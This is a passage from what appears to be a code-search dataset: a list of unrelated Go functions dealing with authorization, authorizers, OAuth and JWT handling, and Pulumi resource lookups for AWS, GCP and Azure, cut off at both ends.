nil {\n\t\treturn nil, fmt.Errorf(\"failed to build request: %w\", err)\n\t}\n\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treq.Header.Set(\"User-Agent\", userAgent)\n\treq.Header.Set(\"Authorization\", \"Bearer \"+c.APIToken)\n\n\tresp, err := c.HTTPClient.Do(req)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to send request: %w\", err)\n\t}\n\n\tdefer resp.Body.Close()\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to read api response: %w\", err)\n\t}\n\n\tif resp.StatusCode != http.StatusOK {\n\t\treturn nil, BadResponseError{\n\t\t\tRequestMethod: req.Method,\n\t\t\tRequestURL: req.URL,\n\t\t\tStatusCode: resp.StatusCode,\n\t\t\tBody: body,\n\t\t\tHeader: resp.Header,\n\t\t\tCause: fmt.Errorf(\"expected status %d\", http.StatusOK),\n\t\t}\n\t}\n\n\ta := Authorization{}\n\terr = json.Unmarshal(body, &a)\n\tif err != nil {\n\t\treturn nil, BadResponseError{\n\t\t\tRequestMethod: req.Method,\n\t\t\tRequestURL: req.URL,\n\t\t\tStatusCode: resp.StatusCode,\n\t\t\tBody: body,\n\t\t\tHeader: resp.Header,\n\t\t\tCause: err,\n\t\t}\n\t}\n\n\treturn &a, nil\n}", "func (o *DataPlaneAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func (o MethodOutput) AuthorizerId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Method) pulumi.StringPtrOutput { return v.AuthorizerId }).(pulumi.StringPtrOutput)\n}", "func (o *WeaviateAPI) Authorizer() runtime.Authorizer {\n\treturn o.APIAuthorizer\n}", "func GetAuthorizationPolicy(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AuthorizationPolicyState, opts ...pulumi.ResourceOption) (*AuthorizationPolicy, error) {\n\tvar resource AuthorizationPolicy\n\terr := ctx.ReadResource(\"gcp:networksecurity/authorizationPolicy:AuthorizationPolicy\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetAlphabet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AlphabetState, opts ...pulumi.ResourceOption) (*Alphabet, error) {\n\tvar resource Alphabet\n\terr := ctx.ReadResource(\"vault:transform/alphabet:Alphabet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetSubscriptionIDAndAuthorizer(c *provider.DNSHandlerConfig) (subscriptionID string, authorizer autorest.Authorizer, err error) {\n\tsubscriptionID, err = c.GetRequiredProperty(\"AZURE_SUBSCRIPTION_ID\", \"subscriptionID\")\n\tif err != nil {\n\t\treturn\n\t}\n\n\t// see https://docs.microsoft.com/en-us/go/azure/azure-sdk-go-authorization\n\tclientID, err := c.GetRequiredProperty(\"AZURE_CLIENT_ID\", \"clientID\")\n\tif err != nil {\n\t\treturn\n\t}\n\tclientSecret, err := c.GetRequiredProperty(\"AZURE_CLIENT_SECRET\", \"clientSecret\")\n\tif err != nil {\n\t\treturn\n\t}\n\ttenantID, err := c.GetRequiredProperty(\"AZURE_TENANT_ID\", \"tenantID\")\n\tif err != nil {\n\t\treturn\n\t}\n\n\tauthorizer, err = auth.NewClientCredentialsConfig(clientID, clientSecret, tenantID).Authorizer()\n\tif err != nil {\n\t\terr = perrs.WrapAsHandlerError(err, \"Creating Azure authorizer with client credentials failed\")\n\t\treturn\n\t}\n\treturn\n}", "func (s Store) Get(id []byte) (perm.AccessControl, error) {\n\treturn accessControl{}, nil\n}", "func NewGetAuth() context.Handler {\n\treturn func(ctx context.Context) {\n\t\tname := ctx.Params().Get(\"name\")\n\t\ttoken := ctx.GetHeader(\"token\")\n\t\tif token == \"\" || getClientToken(name) != token {\n\t\t\tctx.StatusCode(403)\n\t\t\tctx.StopExecution()\n\t\t\treturn\n\t\t}\n\t\tctx.Next()\n\t}\n}", "func (g OrganizationGetter) Get(_ context.Context, id uint) (auth.Organization, error) {\n\torg := auth.Organization{\n\t\tID: id,\n\t}\n\tif err := g.db.Where(&org).Find(&org).Error; err != nil {\n\t\treturn org, errors.WrapIf(err, \"failed to load organization from database\")\n\t}\n\treturn org, nil\n}", "func GetAuthorizers(config *Config) (result Authorizers, err error) {\n\tresult = Authorizers{}\n\tauthorizerslock.RLock()\n\tdefer authorizerslock.RUnlock()\n\n\tvar authorizer Authorizer\n\n\tfor an, ac := range config.Authorizers {\n\t\t// validate authorizer config\n\t\tif err = ac.Validate(); err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tvar (\n\t\t\tfactory AuthorizerFactory\n\t\t\tok bool\n\t\t)\n\t\tif factory, ok = authorizers[ac.Type]; !ok {\n\t\t\terr = fmt.Errorf(\"authorizer %s does not exist\", ac.Type)\n\t\t\treturn\n\t\t}\n\n\t\tif authorizer, err = factory(ac); err != nil {\n\t\t\treturn\n\t\t}\n\t\tresult[an] = authorizer\n\t}\n\n\t// check task authorizers\n\tfor i, ec := range config.Endpoints {\n\t\tfor _, tc := range ec.Methods {\n\t\t\tfor _, a := range tc.Authorizers {\n\t\t\t\tif _, ok := result[a]; !ok {\n\t\t\t\t\terr = fmt.Errorf(\"task %d, invalid authorizer `%s`.\", i, a)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn\n}", "func GetPolicy(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *PolicyState, opts ...pulumi.ResourceOption) (*Policy, error) {\n\tvar resource Policy\n\terr := ctx.ReadResource(\"gcp:organizations/policy:Policy\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewAuthorizer(userDao dao.UserInterface, defaultRole string, roles map[string]Role) (Authorizer, error) {\n\tvar a Authorizer\n\ta.userDao = userDao\n\ta.roles = roles\n\ta.defaultRole = defaultRole\n\tif _, ok := roles[defaultRole]; !ok {\n\t\tlogger.Get().Error(\"Default role provided is not valid\")\n\t\treturn a, mkerror(\"defaultRole missing\")\n\t}\n\treturn a, nil\n}", "func GetPerson(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *PersonState, opts ...pulumi.ResourceOption) (*Person, error) {\n\tvar resource Person\n\terr := ctx.ReadResource(\"example::Person\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func HttpAuthorizerFactory(ac *AuthorizerConfig) (result Authorizer, err error) {\n\n\tvar (\n\t\tconfig *HttpAuthorizerConfig\n\t)\n\n\t// get config\n\tif config, err = NewHttpAuthorizerConfig(ac); err != nil {\n\t\treturn\n\t}\n\n\tha := &HttpAuthorizer{\n\t\tconfig: config,\n\t}\n\n\tresult = ha\n\treturn\n}", "func (c *APIGateway) GetAuthorizersRequest(input *GetAuthorizersInput) (req *request.Request, output *GetAuthorizersOutput) {\n\top := &request.Operation{\n\t\tName: opGetAuthorizers,\n\t\tHTTPMethod: \"GET\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers\",\n\t}\n\n\tif input == nil {\n\t\tinput = &GetAuthorizersInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &GetAuthorizersOutput{}\n\treq.Data = output\n\treturn\n}", "func (s *CreatorServiceImpl) Get(id uint) (*models.Creator, error) {\n\tvar c models.Creator\n\terr := s.db.Preload(clause.Associations).First(&c, id).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &c, nil\n}", "func GetGroupsAuthorizer(creds config.Credentials) (autorest.Authorizer, error) {\n\tif groupsAuthorizer != nil {\n\t\treturn groupsAuthorizer, nil\n\t}\n\n\tvar a autorest.Authorizer\n\tvar err error\n\n\ta, err = getAuthorizerForResource(config.Environment().TokenAudience, creds)\n\n\tif err == nil {\n\t\t// cache\n\t\tgroupsAuthorizer = a\n\t} else {\n\t\tgroupsAuthorizer = nil\n\t}\n\n\treturn groupsAuthorizer, err\n}", "func GetAuthenticator(name string) filter.Authenticator {\n\tif authenticators[name] == nil {\n\t\tpanic(\"authenticator for \" + name + \" is not existing, make sure you have import the package.\")\n\t}\n\treturn authenticators[name]()\n}", "func Get(w http.ResponseWriter, r *http.Request) {\n\tauthUser, err := auth.GetUserFromJWT(w, r)\n\tif err != nil {\n\t\tresponse.FormatStandardResponse(false, \"error-auth\", \"\", err.Error(), w)\n\t\treturn\n\t}\n\n\tvars := mux.Vars(r)\n\tid, err := strconv.Atoi(vars[\"id\"])\n\tif err != nil {\n\t\tresponse.FormatStandardResponse(false, \"error-invalid-acccount\", \"\", err.Error(), w)\n\t\treturn\n\t}\n\n\tgetHandler(w, authUser, false, id)\n}", "func GetAssociation(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AssociationState, opts ...pulumi.ResourceOption) (*Association, error) {\n\tvar resource Association\n\terr := ctx.ReadResource(\"aws:ssm/association:Association\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (c *B2) authGet(apiPath string) (*http.Response, *authorizationState, error) {\n\treq, auth, err := c.authRequest(\"GET\", apiPath, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tresp, err := c.httpClient.Do(req)\n\treturn resp, auth, err\n}", "func (c *APIGateway) GetAuthorizers(input *GetAuthorizersInput) (*GetAuthorizersOutput, error) {\n\treq, out := c.GetAuthorizersRequest(input)\n\terr := req.Send()\n\treturn out, err\n}", "func NewAuthorizer(introspector TokenIntrospecter, cfg *Config) *Authorizer {\n\treturn &Authorizer{introspection: introspector, config: cfg}\n}", "func SelectAuthorizerByType(typeStr string) (Authorizer, error) {\n\tswitch typeStr {\n\tcase ServiceAccountKeyAuthorizerType:\n\t\treturn &ServiceAccountKey{}, nil\n\tcase WorkloadIdentityAuthorizerType:\n\t\treturn &WorkloadIdentity{}, nil\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"GCP: provider authorizer type '%s' is not valid\", typeStr)\n\t}\n}", "func NewAuthorizer(e *casbin.Enforcer) beego.FilterFunc {\n\treturn func(ctx *context.Context) {\n\t\ta := &BasicAuthorizer{enforcer: e}\n\n\t\tif !a.CheckPermission(ctx) {\n\t\t\ta.RequirePermission(ctx)\n\t\t}\n\t}\n}", "func GetDistribution(ctx *pulumi.Context,\n\tname string, id pulumi.ID, state *DistributionState, opts ...pulumi.ResourceOpt) (*Distribution, error) {\n\tinputs := make(map[string]interface{})\n\tif state != nil {\n\t\tinputs[\"activeTrustedSigners\"] = state.ActiveTrustedSigners\n\t\tinputs[\"aliases\"] = state.Aliases\n\t\tinputs[\"arn\"] = state.Arn\n\t\tinputs[\"callerReference\"] = state.CallerReference\n\t\tinputs[\"comment\"] = state.Comment\n\t\tinputs[\"customErrorResponses\"] = state.CustomErrorResponses\n\t\tinputs[\"defaultCacheBehavior\"] = state.DefaultCacheBehavior\n\t\tinputs[\"defaultRootObject\"] = state.DefaultRootObject\n\t\tinputs[\"domainName\"] = state.DomainName\n\t\tinputs[\"enabled\"] = state.Enabled\n\t\tinputs[\"etag\"] = state.Etag\n\t\tinputs[\"hostedZoneId\"] = state.HostedZoneId\n\t\tinputs[\"httpVersion\"] = state.HttpVersion\n\t\tinputs[\"inProgressValidationBatches\"] = state.InProgressValidationBatches\n\t\tinputs[\"isIpv6Enabled\"] = state.IsIpv6Enabled\n\t\tinputs[\"lastModifiedTime\"] = state.LastModifiedTime\n\t\tinputs[\"loggingConfig\"] = state.LoggingConfig\n\t\tinputs[\"orderedCacheBehaviors\"] = state.OrderedCacheBehaviors\n\t\tinputs[\"origins\"] = state.Origins\n\t\tinputs[\"originGroups\"] = state.OriginGroups\n\t\tinputs[\"priceClass\"] = state.PriceClass\n\t\tinputs[\"restrictions\"] = state.Restrictions\n\t\tinputs[\"retainOnDelete\"] = state.RetainOnDelete\n\t\tinputs[\"status\"] = state.Status\n\t\tinputs[\"tags\"] = state.Tags\n\t\tinputs[\"viewerCertificate\"] = state.ViewerCertificate\n\t\tinputs[\"waitForDeployment\"] = state.WaitForDeployment\n\t\tinputs[\"webAclId\"] = state.WebAclId\n\t}\n\ts, err := ctx.ReadResource(\"aws:cloudfront/distribution:Distribution\", name, id, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &Distribution{s: s}, nil\n}", "func GetAggregateAuthorization(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AggregateAuthorizationState, opts ...pulumi.ResourceOption) (*AggregateAuthorization, error) {\n\tvar resource AggregateAuthorization\n\terr := ctx.ReadResource(\"aws:cfg/aggregateAuthorization:AggregateAuthorization\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetAggregateAuthorization(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AggregateAuthorizationState, opts ...pulumi.ResourceOption) (*AggregateAuthorization, error) {\n\tvar resource AggregateAuthorization\n\terr := ctx.ReadResource(\"aws:cfg/aggregateAuthorization:AggregateAuthorization\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (oacsr *OAuthClientSecretReader) Get(ctx context.Context) (entity.OAuthRedirectValues, error) {\n\tOAuthValues := entity.OAuthRedirectValues{}\n\tOAuthValues.GithubOAuthURL = config.ServerConfig.GithubOAuthURL\n\tOAuthValues.ClientID = config.ServerConfig.ClientID\n\tOAuthValues.ClientSecret = config.ServerConfig.ClientSecret\n\tOAuthValues.RedirectURL = config.ServerConfig.OAuthRedirectURL\n\tvar ok bool\n\tOAuthValues.State, ok = ctx.Value(\"state\").(string)\n\tif !ok {\n\t\treturn OAuthValues, errors.New(\"state not present in context\")\n\t}\n\n\treturn OAuthValues, nil\n}", "func GetOrchProvider(name string, config io.Reader) (OrchestratorInterface, error) {\n\tprovidersMutex.Lock()\n\tdefer providersMutex.Unlock()\n\n\tfactory, found := providers[name]\n\tif !found {\n\t\treturn nil, nil\n\t}\n\treturn factory(config)\n}", "func GetAwardByID(data, id interface{}) error {\n\tdb := common.GetDB()\n\terr := db.Where(\"id = ?\", id).First(data).Error\n\treturn err\n}", "func GetRole(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RoleState, opts ...pulumi.ResourceOption) (*Role, error) {\n\tvar resource Role\n\terr := ctx.ReadResource(\"alicloud:ram/role:Role\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetAuthor(id string) (*models.Author, error) {\n\tfor _, author := range Authors {\n\t\tif author.ID == id {\n\t\t\treturn author, nil\n\t\t}\n\t}\n\treturn nil, fmt.Errorf(\"Author (id: %v) was not found\", id)\n}", "func GetRandom(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RandomState, opts ...pulumi.ResourceOption) (*Random, error) {\n\tvar resource Random\n\terr := ctx.ReadResource(\"xyz:index:Random\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func getAuthorization(acmeClient *acme.Client, hostname string) (*acme.Authorization, error) {\n\tctx, cancel := context.WithTimeout(context.Background(), 1*time.Minute)\n\tdefer cancel()\n\n\tauthorization, err := acmeClient.Authorize(ctx, hostname)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tswitch authorization.Status {\n\tcase acme.StatusValid:\n\tcase acme.StatusPending:\n\t\treturn authorization, nil\n\tcase acme.StatusProcessing:\n\t\treturn nil, fmt.Errorf(\"certificate authorization already in progress\")\n\tcase acme.StatusInvalid:\n\tcase acme.StatusRevoked:\n\tcase acme.StatusUnknown:\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"invalid certificate authorization status: %v\", authorization.Status)\n\t}\n\n\treturn authorization, nil\n}", "func GetAdmin(w http.ResponseWriter, r *http.Request) {\n\tid := chi.URLParam(r, \"id\")\n\n\tadm, ok := mustAuthority(r.Context()).LoadAdminByID(id)\n\tif !ok {\n\t\trender.Error(w, admin.NewError(admin.ErrorNotFoundType,\n\t\t\t\"admin %s not found\", id))\n\t\treturn\n\t}\n\trender.ProtoJSON(w, adm)\n}", "func (a *AuthService) GetAuthorization(req *http.Request) (*domains.User, error) {\n\tsession := a.getSession(req)\n\tvar user domains.User\n\tif session != nil {\n\t\tuserBytes := session.Values[userValue]\n\t\tif userBytes != nil {\n\t\t\terr := json.Unmarshal(userBytes.([]byte), &user)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errors.Wrap(err, \"could not unmarshal authorization\")\n\t\t\t}\n\t\t}\n\t}\n\treturn &user, nil\n}", "func (os *OrganizationsService) Get(ctx context.Context, id string) (res *Response, o *Organization, err error) {\n\treturn os.get(ctx, fmt.Sprintf(\"v2/organizations/%s\", id))\n}", "func (o *Rule) HasAuthorizer() bool {\n\tif o != nil && o.Authorizer != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func GetConsentStore(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *ConsentStoreState, opts ...pulumi.ResourceOption) (*ConsentStore, error) {\n\tvar resource ConsentStore\n\terr := ctx.ReadResource(\"gcp:healthcare/consentStore:ConsentStore\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (c *AcademicYearClient) Get(ctx context.Context, id int) (*AcademicYear, error) {\n\treturn c.Query().Where(academicyear.ID(id)).Only(ctx)\n}", "func NewAuthorizerFromEnvironment() (autorest.Authorizer, error) {\n\tsettings, err := getAuthenticationSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif settings.resource == \"\" {\n\t\tsettings.resource = settings.environment.ResourceManagerEndpoint\n\t}\n\n\treturn settings.getAuthorizer()\n}", "func Get(ctx context.Context, rollerName string) (*AutoRollStatus, error) {\n\tvar w DsStatusWrapper\n\tif err := ds.DS.Get(ctx, key(rollerName), &w); err != nil {\n\t\treturn nil, err\n\t}\n\trv := new(AutoRollStatus)\n\tif err := gob.NewDecoder(bytes.NewReader(w.Data)).Decode(rv); err != nil {\n\t\treturn nil, err\n\t}\n\treturn rv, nil\n}", "func NewAuthorizer(signer pkg.Signer) Authorizer {\n\treturn &authorizer{\n\t\tsigner: signer,\n\t}\n}", "func (ja *jwtAuthorizer) Get(token string) (*auth.AuthUser, error) {\n\tt, err := ja.parse(token)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"jwt token cannot be parsed: %s\", err)\n\t}\n\tath := t.Claims[\"user\"].(map[string]interface{})\n\tvar a auth.AuthUser\n\ta.Uid = ath[\"uid\"].(string)\n\ta.Name = ath[\"name\"].(string)\n\ta.Network = ath[\"network\"].(string)\n\ta.BackgroundUrl = ath[\"backgroundurl\"].(string)\n\ta.ThumbnailUrl = ath[\"thumbnail\"].(string)\n\treturn &a, nil\n}", "func (l *Client) GetAuth(id string) (Auth, error) {\n\tres := ApiResp{}\n\tdata := Auth{}\n\n\t// make the request\n\terr := l.Get(parseLyticsURL(authEndpoint, map[string]string{\"id\": id}), nil, nil, &res, &data)\n\tif err != nil {\n\t\treturn data, err\n\t}\n\n\treturn data, nil\n}", "func (a *AuthorizationsService) One() (auth *Authorization, result *Result) {\n\tresult = a.client.get(a.URL, &auth)\n\treturn\n}", "func (a *Middleware) GetUser(connState tls.ConnectionState) (authz.IdentityGetter, error) {\n\tpeers := connState.PeerCertificates\n\tif len(peers) > 1 {\n\t\t// when turning intermediaries on, don't forget to verify\n\t\t// https://github.com/kubernetes/kubernetes/pull/34524/files#diff-2b283dde198c92424df5355f39544aa4R59\n\t\treturn nil, trace.AccessDenied(\"access denied: intermediaries are not supported\")\n\t}\n\n\t// with no client authentication in place, middleware\n\t// assumes not-privileged Nop role.\n\t// it theoretically possible to use bearer token auth even\n\t// for connections without auth, but this is not active use-case\n\t// therefore it is not allowed to reduce scope\n\tif len(peers) == 0 {\n\t\treturn authz.BuiltinRole{\n\t\t\tRole: types.RoleNop,\n\t\t\tUsername: string(types.RoleNop),\n\t\t\tClusterName: a.ClusterName,\n\t\t\tIdentity: tlsca.Identity{},\n\t\t}, nil\n\t}\n\tclientCert := peers[0]\n\n\tidentity, err := tlsca.FromSubject(clientCert.Subject, clientCert.NotAfter)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\t// Since 5.0, teleport TLS certs include the origin teleport cluster in the\n\t// subject (identity). Before 5.0, origin teleport cluster was inferred\n\t// from the cert issuer.\n\tcertClusterName := identity.TeleportCluster\n\tif certClusterName == \"\" {\n\t\tcertClusterName, err = tlsca.ClusterName(clientCert.Issuer)\n\t\tif err != nil {\n\t\t\tlog.Warnf(\"Failed to parse client certificate %v.\", err)\n\t\t\treturn nil, trace.AccessDenied(\"access denied: invalid client certificate\")\n\t\t}\n\t\tidentity.TeleportCluster = certClusterName\n\t}\n\t// If there is any restriction on the certificate usage\n\t// reject the API server request. This is done so some classes\n\t// of certificates issued for kubernetes usage by proxy, can not be used\n\t// against auth server. Later on we can extend more\n\t// advanced cert usage, but for now this is the safest option.\n\tif len(identity.Usage) != 0 && !slices.Equal(a.AcceptedUsage, identity.Usage) {\n\t\tlog.Warningf(\"Restricted certificate of user %q with usage %v rejected while accessing the auth endpoint with acceptable usage %v.\",\n\t\t\tidentity.Username, identity.Usage, a.AcceptedUsage)\n\t\treturn nil, trace.AccessDenied(\"access denied: invalid client certificate\")\n\t}\n\n\t// this block assumes interactive user from remote cluster\n\t// based on the remote certificate authority cluster name encoded in\n\t// x509 organization name. This is a safe check because:\n\t// 1. Trust and verification is established during TLS handshake\n\t// by creating a cert pool constructed of trusted certificate authorities\n\t// 2. Remote CAs are not allowed to have the same cluster name\n\t// as the local certificate authority\n\tif certClusterName != a.ClusterName {\n\t\t// make sure that this user does not have system role\n\t\t// the local auth server can not truste remote servers\n\t\t// to issue certificates with system roles (e.g. Admin),\n\t\t// to get unrestricted access to the local cluster\n\t\tsystemRole := findPrimarySystemRole(identity.Groups)\n\t\tif systemRole != nil {\n\t\t\treturn authz.RemoteBuiltinRole{\n\t\t\t\tRole: *systemRole,\n\t\t\t\tUsername: identity.Username,\n\t\t\t\tClusterName: certClusterName,\n\t\t\t\tIdentity: *identity,\n\t\t\t}, nil\n\t\t}\n\t\treturn newRemoteUserFromIdentity(*identity, certClusterName), nil\n\t}\n\t// code below expects user or service from local cluster, to distinguish between\n\t// interactive users and services (e.g. proxies), the code below\n\t// checks for presence of system roles issued in certificate identity\n\tsystemRole := findPrimarySystemRole(identity.Groups)\n\t// in case if the system role is present, assume this is a service\n\t// agent, e.g. Proxy, connecting to the cluster\n\tif systemRole != nil {\n\t\treturn authz.BuiltinRole{\n\t\t\tRole: *systemRole,\n\t\t\tAdditionalSystemRoles: extractAdditionalSystemRoles(identity.SystemRoles),\n\t\t\tUsername: identity.Username,\n\t\t\tClusterName: a.ClusterName,\n\t\t\tIdentity: *identity,\n\t\t}, nil\n\t}\n\t// otherwise assume that is a local role, no need to pass the roles\n\t// as it will be fetched from the local database\n\treturn newLocalUserFromIdentity(*identity), nil\n}", "func (m *User) GetAuthorizationInfo()(AuthorizationInfoable) {\n return m.authorizationInfo\n}", "func (u UserHandler) GetProvider(name string) (prov AuthenticationProvider, err error) {\n\tif err = u.db.Where(AuthenticationProvider{Name: name}).First(&prov).Error; err != nil {\n\t\terr = fmt.Errorf(\"failed finding provider: %w\", err)\n\t}\n\treturn\n}", "func GetAnalyzer(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AnalyzerState, opts ...pulumi.ResourceOption) (*Analyzer, error) {\n\tvar resource Analyzer\n\terr := ctx.ReadResource(\"azure:videoanalyzer/analyzer:Analyzer\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (r *authorsResource) GetAuthor(request *restful.Request, response *restful.Response) {\n\tauthorID := request.PathParameter(\"author-id\")\n\tctx := context.Background()\n\n\tres, err := r.service.GetAuthor(ctx, authorID)\n\tif err != nil {\n\t\tencodeErrorWithStatus(response, err, http.StatusBadRequest)\n\t}\n\n\tresponse.WriteHeaderAndEntity(http.StatusOK, res)\n}", "func (c *GenderClient) Get(ctx context.Context, id int) (*Gender, error) {\n\treturn c.Query().Where(gender.ID(id)).Only(ctx)\n}", "func (c *GenderClient) Get(ctx context.Context, id int) (*Gender, error) {\n\treturn c.Query().Where(gender.ID(id)).Only(ctx)\n}", "func GetSyncAuthorization(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *SyncAuthorizationState, opts ...pulumi.ResourceOption) (*SyncAuthorization, error) {\n\tvar resource SyncAuthorization\n\terr := ctx.ReadResource(\"gcp:apigee/syncAuthorization:SyncAuthorization\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (dfc DeviceFlowConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := dfc.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from device flow: %v\", err)\n\t}\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func NewAuthorizer(configuration schema.AccessControlConfiguration) *Authorizer {\n\treturn &Authorizer{\n\t\tconfiguration: configuration,\n\t}\n}", "func GetRealm(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RealmState, opts ...pulumi.ResourceOption) (*Realm, error) {\n\tvar resource Realm\n\terr := ctx.ReadResource(\"gcp:gameservices/realm:Realm\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (a *Authorizer) GetRole(name string) Role {\n\ta.RLock()\n\tr := a.roles[name]\n\ta.RUnlock()\n\treturn r\n}", "func (dfc DeviceFlowConfig) Authorizer() (autorest.Authorizer, error) {\n\toauthClient := &autorest.Client{}\n\toauthConfig, err := adal.NewOAuthConfig(dfc.AADEndpoint, dfc.TenantID)\n\tdeviceCode, err := adal.InitiateDeviceAuth(oauthClient, *oauthConfig, dfc.ClientID, dfc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to start device auth flow: %s\", err)\n\t}\n\n\tlog.Println(*deviceCode.Message)\n\n\ttoken, err := adal.WaitForUserCompletion(oauthClient, deviceCode)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to finish device auth flow: %s\", err)\n\t}\n\n\tspToken, err := adal.NewServicePrincipalTokenFromManualToken(*oauthConfig, dfc.ClientID, dfc.Resource, *token)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from device flow: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func GetDomainName(ctx *pulumi.Context,\n\tname string, id pulumi.ID, state *DomainNameState, opts ...pulumi.ResourceOpt) (*DomainName, error) {\n\tinputs := make(map[string]interface{})\n\tif state != nil {\n\t\tinputs[\"arn\"] = state.Arn\n\t\tinputs[\"certificateArn\"] = state.CertificateArn\n\t\tinputs[\"certificateBody\"] = state.CertificateBody\n\t\tinputs[\"certificateChain\"] = state.CertificateChain\n\t\tinputs[\"certificateName\"] = state.CertificateName\n\t\tinputs[\"certificatePrivateKey\"] = state.CertificatePrivateKey\n\t\tinputs[\"certificateUploadDate\"] = state.CertificateUploadDate\n\t\tinputs[\"cloudfrontDomainName\"] = state.CloudfrontDomainName\n\t\tinputs[\"cloudfrontZoneId\"] = state.CloudfrontZoneId\n\t\tinputs[\"domainName\"] = state.DomainName\n\t\tinputs[\"endpointConfiguration\"] = state.EndpointConfiguration\n\t\tinputs[\"regionalCertificateArn\"] = state.RegionalCertificateArn\n\t\tinputs[\"regionalCertificateName\"] = state.RegionalCertificateName\n\t\tinputs[\"regionalDomainName\"] = state.RegionalDomainName\n\t\tinputs[\"regionalZoneId\"] = state.RegionalZoneId\n\t\tinputs[\"securityPolicy\"] = state.SecurityPolicy\n\t\tinputs[\"tags\"] = state.Tags\n\t}\n\ts, err := ctx.ReadResource(\"aws:apigateway/domainName:DomainName\", name, id, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &DomainName{s: s}, nil\n}", "func GetAgent(id uuid.UUID) (Agent, error) {\n\tagent, ok := agents.Load(id)\n\tif !ok {\n\t\treturn Agent{}, errors.New(\"Agent not present\")\n\t}\n\treturn agent, nil\n}", "func GetLicenseGrantAccepter(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *LicenseGrantAccepterState, opts ...pulumi.ResourceOption) (*LicenseGrantAccepter, error) {\n\tvar resource LicenseGrantAccepter\n\terr := ctx.ReadResource(\"aws:licensemanager/licenseGrantAccepter:LicenseGrantAccepter\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetLicense(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *LicenseState, opts ...pulumi.ResourceOption) (*License, error) {\n\tvar resource License\n\terr := ctx.ReadResource(\"consul:index/license:License\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (a *AuthorizationsApiService) GetAuthorizationsID(ctx _context.Context, authID string) ApiGetAuthorizationsIDRequest {\n\treturn ApiGetAuthorizationsIDRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t\tauthID: authID,\n\t}\n}", "func GetAuthMiddleware(cfg *types.Config) gin.HandlerFunc {\n\tif !cfg.OIDCEnable {\n\t\treturn 